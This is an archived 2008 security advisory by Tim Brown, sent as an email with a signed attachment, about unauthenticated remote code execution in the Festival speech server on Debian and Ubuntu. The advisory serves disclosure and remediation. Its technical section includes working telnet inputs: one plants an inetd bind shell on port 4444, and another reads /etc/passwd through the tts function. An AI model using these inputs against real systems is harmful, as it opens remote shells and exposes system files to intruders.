AOH :: HP Unsorted F :: BX2666.HTM

Festival - mid-level security hole on Debian unstable/testing and Ubuntu Hardy Heron



Medium security hole affecting Festival on Debian unstable/testing and Ubuntu Hardy Heron
Medium security hole affecting Festival on Debian unstable/testing and Ubuntu Hardy Heron



--Boundary-00=_OcW9H5Kxi8CNemD
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

It has been recently been identified that the Festival text to speech server 
was vulnerable to unauthenticated remote code execution.  Further research 
indicated that this vulnerability has already been reported as a local 
privilege escalation against both the Gentoo and SuSE GNU/Linux distributions 
and had assigned CVE-2007-4074.  The remote form of this vulnerability was 
originally identified in the default configuration of Festival 1.96~beta-5 as 
distributed in Debian unstable but Ubuntu Hardy Heron was also affected. Both 
Debian and Ubuntu have since released patches to resolve this flaw.  An 
advisory for this flaw which provides further information is attached.  A 
short analysis of Debian's response can be found at 
http://www.nth-dimension.org.uk/blog.php?id=68. 

Cheers,
Tim
-- 
Tim Brown
 
 

--Boundary-00=_OcW9H5Kxi8CNemD
Content-Type: application/pgp-keys;
  name="NDSA20080215.txt.asc"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="NDSA20080215.txt.asc"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown  
URL:  /  
Product: Festival 1.96:beta July 2004  
Vendor: Centre for Speech Technology Research, University of Edinburgh  
Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution.

Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux 
distributions and was assigned CVE-2007-4074.

The remote form of this vulnerability was identified in 1.96~beta-5 as
distributed in Debian unstable but it is also believed that Ubuntu Hardy
Heron was affected.

Technical Details

The Festival server which can be started using festival --server is vulnerable
to unauthenticated remote command execution due to the inclusion of a scheme
interpreter.  It is possible to make use of standard scheme functions in order
to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack.  Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in this
manner is entirely intentional, the default behaviour of the server could be
exploited particularly where the user is unaware of the servers existance.  In
the case of both Debian unstable and Ubuntu Hardy Heron, this meant that the
server was likely to be started by the init subsystem albeit as a non-privileged
user.

Solutions

In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall.  The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477. 
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.

Following vendor notification on the 16th Febuary 2007 (Debian) and 2nd March 2007
(Ubuntu), both issued patched versions in their respective distributions which
document the possible security issue and how it can be resolved and change the
default behaviour of the package to prevent the server being started by the init
subsystem.  Details of the Debian changes can be found firstly in bug #466146
and then #466796.  Nth Dimension would recommend that the patches for these bugs
are applied.  Nth Dimension would like to thank the Debian package maintainer
Kumar Appaiahi as well as Nico Golde of Debian testing security and Jamie
Strandboge of Canonical for the way they worked to resolve the issue.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFH9VORVAlO5exu9x8RAj8RAJ9FTxsDc5sQrIpIyNTStiaui5zISwCeMPiW
+wuTceT8SGnNjV9mUsilh0w=dOSa
-----END PGP SIGNATURE-----

--Boundary-00=_OcW9H5Kxi8CNemD--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.